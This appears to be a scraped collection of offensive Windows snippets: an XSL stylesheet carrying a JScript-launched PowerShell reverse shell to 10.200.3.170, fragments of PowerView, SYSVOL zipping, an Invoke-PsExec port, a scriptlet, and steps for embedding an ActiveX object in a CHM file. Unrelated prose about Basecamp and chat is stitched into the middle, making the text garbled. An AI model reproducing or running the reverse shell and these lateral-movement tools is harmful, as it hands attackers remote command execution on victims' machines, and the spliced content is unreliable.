- Recon
- Find vuln
- Exploit
- Escalate
- Document it
| <?xml version='1.0'?> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Command \"$client = New-Object System.Net.Sockets.TCPClient('10.200.3.170',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",0,true); | |
| ]]> </ms:script> |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
| function New-SYSVOLZip { | |
| <# | |
| .SYNOPSIS | |
| Compresses all folders/files in SYSVOL to a .zip file. | |
| Author: Will Schroeder (@harmj0y) | |
| License: BSD 3-Clause | |
| Required Dependencies: None |
| function Invoke-PsExec { | |
| <# | |
| .SYNOPSIS | |
| This function is a rough port of Metasploit's psexec functionality. | |
| It utilizes Windows API calls to open up the service manager on | |
| a remote machine, creates/run a service with an associated binary | |
| path or command, and then cleans everything up. | |
| Either a -Command or a custom -ServiceEXE can be specified. | |
| For -Commands, a -ResultsFile can also be specified to retrieve the |
Any mistakes are my own. Basecamp is a modern software company that (by many estimates) generates millions of dollars in profit each month.
Since the beginning of Basecamp, we've been loath to make promises about future product improvements. We've always wanted customers to judge the product they could buy and use today, not some imaginary version that might exist in the future.
Chat puts conversations on conveyor belts that are perpetually moving away from you. If you're not at your station when the conversation rolls by, you'll never get a chance to put in your two cents. This means if you want to have your say, you need to be paying attention all day (and often to multiple rooms/channels). ... Chat is great for hashing stuff out quickly when speed truly is important. ... It's also great for watercooler-like banter ... building a camaraderie among people during gaps in the workday.
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.ComponentModel; | |
| using System.Linq; | |
| using System.Net; | |
| using System.Net.Sockets; |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
- Step 0: Download and install Microsoft HTML Help Workshop and Documentation
- Step 1: Obtain a valid CHM file and unpack it using 7-zip
- Step 2: Find an entry-point HTML file within the "docs" directory and insert the following code into its
<body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
| function Get-AntiVirusProduct { | |
| [CmdletBinding()] | |
| param ( | |
| [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] | |
| [Alias('name')] | |
| $computername=$env:computername | |
| ) |